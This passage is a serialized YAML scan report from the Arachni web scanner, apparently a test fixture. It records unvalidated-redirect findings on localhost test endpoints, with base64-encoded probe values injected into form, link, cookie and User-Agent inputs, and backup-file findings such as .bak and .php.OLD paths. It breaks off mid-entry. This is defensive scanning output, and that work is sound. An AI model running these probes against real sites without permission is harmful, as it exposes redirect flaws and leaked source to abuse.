OWASP Top 10 2010: http://www.owasp.org/index.php/Top_10_2010-A10-Unvalidated_Redirects_and_Forwards
opts:
:redundant: false
:async: true
:elements:
- link
- form
- cookie
- header
- body
:train:
:injected_orig: www.arachni-boogie-woogie.com
:altered: !binary |-
aW5wdXQ=
:element: form
:params:
!binary "aW5wdXQ=": !binary |-
ZGVmYXVsdHd3dy5hcmFjaG5pLWJvb2dpZS13b29naWUuY29tAA==
:follow_location: true
:injected: !binary |-
ZGVmYXVsdHd3dy5hcmFjaG5pLWJvb2dpZS13b29naWUuY29tAA==
:combo:
!binary "aW5wdXQ=": !binary |-
ZGVmYXVsdHd3dy5hcmFjaG5pLWJvb2dpZS13b29naWUuY29tAA==
:action: http://localhost:7027/form/append
:regexp: ''
var: input
url: http://localhost:7027/form/append
injected: !binary |-
ZGVmYXVsdHd3dy5hcmFjaG5pLWJvb2dpZS13b29naWUuY29tAA==
id:
regexp: ''
regexp_match:
elem: form
remarks: {}
method: GET
response: ''
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "TG9jYXRpb24=": !binary |-
aHR0cDovL3d3dy5hcmFjaG5pLWJvb2dpZS13b29naWUuY29t
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MA==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxNjozMiBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Unvalidated redirect
description: The web application redirects users to unvalidated URLs.
tags:
- unvalidated
- redirect
- injection
- header
- location
cwe: '819'
cwe_url: http://cwe.mitre.org/data/definitions/819.html
severity: Medium
remedy_guidance: ! "Server side verification should be employed\n to
ensure that the redirect destination is the one intended."
mod_name: Unvalidated redirect
variations: []
internal_modname: UnvalidatedRedirect
internal_modname: UnvalidatedRedirect
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP Top 10 2010: http://www.owasp.org/index.php/Top_10_2010-A10-Unvalidated_Redirects_and_Forwards
var: input
url: http://localhost:7027/link/straight?input=default
elem: link
method: GET
name: Unvalidated redirect
description: The web application redirects users to unvalidated URLs.
tags:
- unvalidated
- redirect
- injection
- header
- location
cwe: '819'
cwe_url: http://cwe.mitre.org/data/definitions/819.html
severity: Medium
remedy_guidance: ! "Server side verification should be employed\n to
ensure that the redirect destination is the one intended."
mod_name: Unvalidated redirect
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP Top 10 2010: http://www.owasp.org/index.php/Top_10_2010-A10-Unvalidated_Redirects_and_Forwards
opts:
:redundant: false
:async: true
:elements:
- link
- form
- cookie
- header
- body
:train:
:injected_orig: www.arachni-boogie-woogie.com
:altered: !binary |-
aW5wdXQ=
:element: link
:params:
!binary "aW5wdXQ=": !binary |-
d3d3LmFyYWNobmktYm9vZ2llLXdvb2dpZS5jb20A
:follow_location: true
:injected: !binary |-
d3d3LmFyYWNobmktYm9vZ2llLXdvb2dpZS5jb20A
:combo:
!binary "aW5wdXQ=": !binary |-
d3d3LmFyYWNobmktYm9vZ2llLXdvb2dpZS5jb20A
:action: http://localhost:7027/link/straight?input=default
:regexp: ''
var: input
url: http://localhost:7027/link/straight?input=default
injected: !binary |-
d3d3LmFyYWNobmktYm9vZ2llLXdvb2dpZS5jb20A
id:
regexp: ''
regexp_match:
elem: link
remarks:
:stuff:
- Blah
- Blah2
method: GET
response: ''
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "TG9jYXRpb24=": !binary |-
aHR0cDovL3d3dy5hcmFjaG5pLWJvb2dpZS13b29naWUuY29t
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MA==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxNjozNiBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Unvalidated redirect
description: The web application redirects users to unvalidated URLs.
tags:
- unvalidated
- redirect
- injection
- header
- location
cwe: '819'
cwe_url: http://cwe.mitre.org/data/definitions/819.html
severity: Medium
remedy_guidance: ! "Server side verification should be employed\n to
ensure that the redirect destination is the one intended."
mod_name: Unvalidated redirect
variations: []
internal_modname: UnvalidatedRedirect
internal_modname: UnvalidatedRedirect
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP Top 10 2010: http://www.owasp.org/index.php/Top_10_2010-A10-Unvalidated_Redirects_and_Forwards
var: input
url: http://localhost:7027/link/append?input=default
elem: link
method: GET
name: Unvalidated redirect
description: The web application redirects users to unvalidated URLs.
tags:
- unvalidated
- redirect
- injection
- header
- location
cwe: '819'
cwe_url: http://cwe.mitre.org/data/definitions/819.html
severity: Medium
remedy_guidance: ! "Server side verification should be employed\n to
ensure that the redirect destination is the one intended."
mod_name: Unvalidated redirect
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP Top 10 2010: http://www.owasp.org/index.php/Top_10_2010-A10-Unvalidated_Redirects_and_Forwards
opts:
:redundant: false
:async: true
:elements:
- link
- form
- cookie
- header
- body
:train:
:injected_orig: www.arachni-boogie-woogie.com
:altered: !binary |-
aW5wdXQ=
:element: link
:params:
!binary "aW5wdXQ=": !binary |-
ZGVmYXVsdHd3dy5hcmFjaG5pLWJvb2dpZS13b29naWUuY29tAA==
:follow_location: true
:injected: !binary |-
ZGVmYXVsdHd3dy5hcmFjaG5pLWJvb2dpZS13b29naWUuY29tAA==
:combo:
!binary "aW5wdXQ=": !binary |-
ZGVmYXVsdHd3dy5hcmFjaG5pLWJvb2dpZS13b29naWUuY29tAA==
:action: http://localhost:7027/link/append?input=default
:regexp: ''
var: input
url: http://localhost:7027/link/append?input=default
injected: !binary |-
ZGVmYXVsdHd3dy5hcmFjaG5pLWJvb2dpZS13b29naWUuY29tAA==
id:
regexp: ''
regexp_match:
elem: link
remarks: {}
method: GET
response: ''
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "TG9jYXRpb24=": !binary |-
aHR0cDovL3d3dy5hcmFjaG5pLWJvb2dpZS13b29naWUuY29t
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MA==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxNjozNiBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Unvalidated redirect
description: The web application redirects users to unvalidated URLs.
tags:
- unvalidated
- redirect
- injection
- header
- location
cwe: '819'
cwe_url: http://cwe.mitre.org/data/definitions/819.html
severity: Medium
remedy_guidance: ! "Server side verification should be employed\n to
ensure that the redirect destination is the one intended."
mod_name: Unvalidated redirect
variations: []
internal_modname: UnvalidatedRedirect
internal_modname: UnvalidatedRedirect
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP Top 10 2010: http://www.owasp.org/index.php/Top_10_2010-A10-Unvalidated_Redirects_and_Forwards
var: cookie2
url: http://localhost:7027/cookie/append
elem: cookie
method: GET
name: Unvalidated redirect
description: The web application redirects users to unvalidated URLs.
tags:
- unvalidated
- redirect
- injection
- header
- location
cwe: '819'
cwe_url: http://cwe.mitre.org/data/definitions/819.html
severity: Medium
remedy_guidance: ! "Server side verification should be employed\n to
ensure that the redirect destination is the one intended."
mod_name: Unvalidated redirect
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP Top 10 2010: http://www.owasp.org/index.php/Top_10_2010-A10-Unvalidated_Redirects_and_Forwards
opts:
:redundant: false
:async: true
:elements:
- link
- form
- cookie
- header
- body
:train:
:injected_orig: www.arachni-boogie-woogie.com
:altered: !binary |-
Y29va2llMg==
:element: cookie
:params: {}
:follow_location: true
:cookies:
!binary "Y29va2llMg==": !binary |-
Y29va2llIHZhbHVld3d3LmFyYWNobmktYm9vZ2llLXdvb2dpZS5jb20A
:injected: !binary |-
Y29va2llIHZhbHVld3d3LmFyYWNobmktYm9vZ2llLXdvb2dpZS5jb20A
:combo:
!binary "Y29va2llMg==": !binary |-
Y29va2llIHZhbHVld3d3LmFyYWNobmktYm9vZ2llLXdvb2dpZS5jb20A
:action: http://localhost:7027/cookie/append
:regexp: ''
var: cookie2
url: http://localhost:7027/cookie/append
injected: !binary |-
Y29va2llIHZhbHVld3d3LmFyYWNobmktYm9vZ2llLXdvb2dpZS5jb20A
id:
regexp: ''
regexp_match:
elem: cookie
remarks: {}
method: GET
response: ''
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+valuewww.arachni-boogie-woogie.com%00
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "TG9jYXRpb24=": !binary |-
aHR0cDovL3d3dy5hcmFjaG5pLWJvb2dpZS13b29naWUuY29t
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MA==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxNjozOSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Unvalidated redirect
description: The web application redirects users to unvalidated URLs.
tags:
- unvalidated
- redirect
- injection
- header
- location
cwe: '819'
cwe_url: http://cwe.mitre.org/data/definitions/819.html
severity: Medium
remedy_guidance: ! "Server side verification should be employed\n to
ensure that the redirect destination is the one intended."
mod_name: Unvalidated redirect
variations: []
internal_modname: UnvalidatedRedirect
internal_modname: UnvalidatedRedirect
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP Top 10 2010: http://www.owasp.org/index.php/Top_10_2010-A10-Unvalidated_Redirects_and_Forwards
var: User-Agent
url: http://localhost:7027/header/append
elem: header
method: GET
name: Unvalidated redirect
description: The web application redirects users to unvalidated URLs.
tags:
- unvalidated
- redirect
- injection
- header
- location
cwe: '819'
cwe_url: http://cwe.mitre.org/data/definitions/819.html
severity: Medium
remedy_guidance: ! "Server side verification should be employed\n to
ensure that the redirect destination is the one intended."
mod_name: Unvalidated redirect
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP Top 10 2010: http://www.owasp.org/index.php/Top_10_2010-A10-Unvalidated_Redirects_and_Forwards
opts:
:redundant: false
:async: true
:elements:
- link
- form
- cookie
- header
- body
:train:
:injected_orig: www.arachni-boogie-woogie.com
:altered: User-Agent
:element: header
:params:
:follow_location: true
:headers:
User-Agent: !binary |-
YXJhY2huaV91c2Vyd3d3LmFyYWNobmktYm9vZ2llLXdvb2dpZS5jb20A
:injected: !binary |-
YXJhY2huaV91c2Vyd3d3LmFyYWNobmktYm9vZ2llLXdvb2dpZS5jb20A
:combo:
User-Agent: !binary |-
YXJhY2huaV91c2Vyd3d3LmFyYWNobmktYm9vZ2llLXdvb2dpZS5jb20A
:action: http://localhost:7027/header/append
:regexp: ''
var: User-Agent
url: http://localhost:7027/header/append
injected: !binary |-
YXJhY2huaV91c2Vyd3d3LmFyYWNobmktYm9vZ2llLXdvb2dpZS5jb20A
id:
regexp: ''
regexp_match:
elem: header
remarks: {}
method: GET
response: ''
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: !binary |-
YXJhY2huaV91c2Vyd3d3LmFyYWNobmktYm9vZ2llLXdvb2dpZS5jb20A
Cookie: cookie2=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "TG9jYXRpb24=": !binary |-
aHR0cDovL3d3dy5hcmFjaG5pLWJvb2dpZS13b29naWUuY29t
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MA==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxNjo0MyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Unvalidated redirect
description: The web application redirects users to unvalidated URLs.
tags:
- unvalidated
- redirect
- injection
- header
- location
cwe: '819'
cwe_url: http://cwe.mitre.org/data/definitions/819.html
severity: Medium
remedy_guidance: ! "Server side verification should be employed\n to
ensure that the redirect destination is the one intended."
mod_name: Unvalidated redirect
variations: []
internal_modname: UnvalidatedRedirect
internal_modname: UnvalidatedRedirect
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
url: http://localhost:8405/some_filename.old
elem: path
method: ''
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move the
files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
opts:
:regexp: ''
url: http://localhost:8405/some_filename.old
injected: some_filename.old
id: some_filename.old
elem: path
remarks: {}
method: ''
response: some_filename.old
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTc=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTowOSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move
the files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations: []
internal_modname: BackupFiles
internal_modname: BackupFiles
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
url: http://localhost:8405/some_filename.bak
elem: path
method: ''
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move the
files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
opts:
:regexp: ''
url: http://localhost:8405/some_filename.bak
injected: some_filename.bak
id: some_filename.bak
elem: path
remarks: {}
method: ''
response: some_filename.bak
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTc=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTowOSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move
the files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations: []
internal_modname: BackupFiles
internal_modname: BackupFiles
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
url: http://localhost:8405/some_filename.php.BAK
elem: path
method: ''
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move the
files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
opts:
:regexp: ''
url: http://localhost:8405/some_filename.php.BAK
injected: some_filename.php.BAK
id: some_filename.php.BAK
elem: path
remarks: {}
method: ''
response: some_filename.php.BAK
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MjE=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTowOSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move
the files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations: []
internal_modname: BackupFiles
internal_modname: BackupFiles
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
url: http://localhost:8405/some_filename.php.OLD
elem: path
method: ''
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move the
files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
opts:
:regexp: ''
url: http://localhost:8405/some_filename.php.OLD
injected: some_filename.php.OLD
id: some_filename.php.OLD
elem: path
remarks: {}
method: ''
response: some_filename.php.OLD
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MjE=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTowOSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move
the files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations: []
internal_modname: BackupFiles
internal_modname: BackupFiles
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
url: http://localhost:8405/some_filename.php.bak
elem: path
method: ''
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move the
files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
opts:
:regexp: ''
url: http://localhost:8405/some_filename.php.bak
injected: some_filename.php.bak
id: some_filename.php.bak
elem: path
remarks: {}
method: ''
response: some_filename.php.bak
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MjE=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTowOSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move
the files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations: []
internal_modname: BackupFiles
internal_modname: BackupFiles
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
url: http://localhost:8405/some_filename.OLD
elem: path
method: ''
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move the
files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
opts:
:regexp: ''
url: http://localhost:8405/some_filename.OLD
injected: some_filename.OLD
id: some_filename.OLD
elem: path
remarks: {}
method: ''
response: some_filename.OLD
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTc=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTowOSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move
the files to a directory outside the virtual root, edit them there,\n and
